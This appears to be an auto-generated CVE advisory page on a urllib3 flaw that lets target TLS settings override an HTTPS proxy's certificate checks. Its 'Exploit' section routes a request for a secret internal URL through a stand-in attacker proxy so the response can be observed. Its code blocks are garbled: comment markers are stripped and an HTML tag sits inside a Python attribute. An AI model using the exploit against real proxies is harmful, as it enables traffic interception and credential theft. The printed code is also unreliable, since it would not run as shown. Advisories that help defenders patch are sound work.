urllib3, TLS Context Isolation Failure, CVE-2026-97687 (High) -DC-Sep2026-2660

Listen to this Post

CVE-2026-97687 is a high-severity vulnerability in the Python urllib3 HTTP client library, affecting versions 1.26.0 through 2.7.0. The flaw resides in how urllib3 manages TLS configuration separation between an HTTPS proxy and the target server. In affected versions, target-server TLS settings—such as ssl_context, cert_reqs, and verify_mode—could be incorrectly applied to the HTTPS proxy connection instead of the explicitly configured proxy_ssl_context. This confusion allowed target-specific certificate verification policies to overwrite the proxy’s own policies, sometimes mutating the proxy’s SSL context in place. An attacker who can intercept network traffic to an HTTPS proxy could exploit this misconfiguration to impersonate the proxy if the effective policy disables certificate verification or accepts a forged certificate. When HTTPS forwarding is enabled, the attacker could then observe or modify forwarded requests and responses, potentially exposing credentials, tokens, request bodies, and response data. The vulnerability also risks presenting a TLS client certificate intended for the target server to the proxy or an impersonating attacker, leaking the client’s identity. The issue is fixed in urllib3 2.8.0, which now independently applies proxy-specific TLS settings and prevents target settings from bleeding into the proxy handshake.

DailyCVE Form:

Platform: urllib3
Version: 1.26.0-2.7.0
Vulnerability : TLS context confusion
Severity: High
date: 2026-09-29

Prediction: 2026-09-15

What Undercode Say

Analytics

Check installed urllib3 version
pip show urllib3 | grep Version
Verify if vulnerable range
python -c "import urllib3; print(urllib3.<strong>version</strong>)"
Vulnerable pattern: target cert_reqs leaks to proxy context
import urllib3
from urllib3 import ProxyManager
proxy_ctx = urllib3.util.ssl_.create_urllib3_context()
proxy_ctx.verify_mode = 2 CERT_REQUIRED
http = ProxyManager(
"https://proxy.example.com:8080",
proxy_ssl_context=proxy_ctx,
cert_reqs="CERT_NONE", target setting
ssl_context=urllib3.util.ssl_.create_urllib3_context(),
use_forwarding_for_https=True,
)
proxy_ctx.verify_mode may become 0 (CERT_NONE)
print(proxy_ctx.verify_mode)
Check for the mutation in existing code
grep -rn "proxy_ssl_context" /path/to/your/project/
grep -rn "use_forwarding_for_https" /path/to/your/project/

Exploit: (Educational Purposes!)

Educational demonstration only — do not use against real systems
import urllib3
from urllib3 import ProxyManager
Attacker-controlled HTTPS proxy with self-signed cert
ATTACKER_PROXY = "https://attacker-proxy.local:443"
Victim code mistakenly disables target cert verification
victim_context = urllib3.util.ssl_.create_urllib3_context()
victim_context.verify_mode = 0 CERT_NONE for target
proxy_context = urllib3.util.ssl_.create_urllib3_context()
proxy_context.verify_mode = 2 intended CERT_REQUIRED
http = ProxyManager(
ATTACKER_PROXY,
proxy_ssl_context=proxy_context,
ssl_context=victim_context,
cert_reqs="CERT_NONE",
use_forwarding_for_https=True,
)
Proxy context verification is silently disabled
assert proxy_context.verify_mode == 0
Request is forwarded through the attacker's proxy
response = http.request("GET", "https://internal.example.com/secret")
print(response.data) Attacker observes this

Protection: from this CVE

Upgrade to patched version
pip install --upgrade "urllib3>=2.8.0"
Safe configuration after upgrade
import urllib3
from urllib3 import ProxyManager
proxy_ctx = urllib3.util.ssl_.create_urllib3_context()
proxy_ctx.verify_mode = 2 CERT_REQUIRED
proxy_ctx.check_hostname = True
target_ctx = urllib3.util.ssl_.create_urllib3_context()
target_ctx.verify_mode = 2
target_ctx.check_hostname = True
http = ProxyManager(
"https://proxy.example.com:8080",
proxy_ssl_context=proxy_ctx,
ssl_context=target_ctx,
use_forwarding_for_https=True,
)
Proxy context remains isolated and verified
Audit dependencies for vulnerable urllib3
pip-audit --vulnerability CVE-2026-97687
or
safety check --id 97687

Impact

The vulnerability allows a network-positioned attacker to impersonate an HTTPS proxy when target-server TLS policies are incorrectly applied to the proxy connection. Successful exploitation can lead to observation or modification of forwarded HTTPS traffic, disclosure of credentials, authentication tokens, request and response bodies, and other sensitive data. A TLS client certificate intended for the target server may also be presented to the attacker, disclosing the client’s identity and proof of private key possession. In CONNECT tunneling mode, the separate end-to-end TLS connection between client and target remains intact, limiting the impact for that specific mode. The issue is rated high severity and affects all urllib3 versions from 1.26.0 through 2.7.0.

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top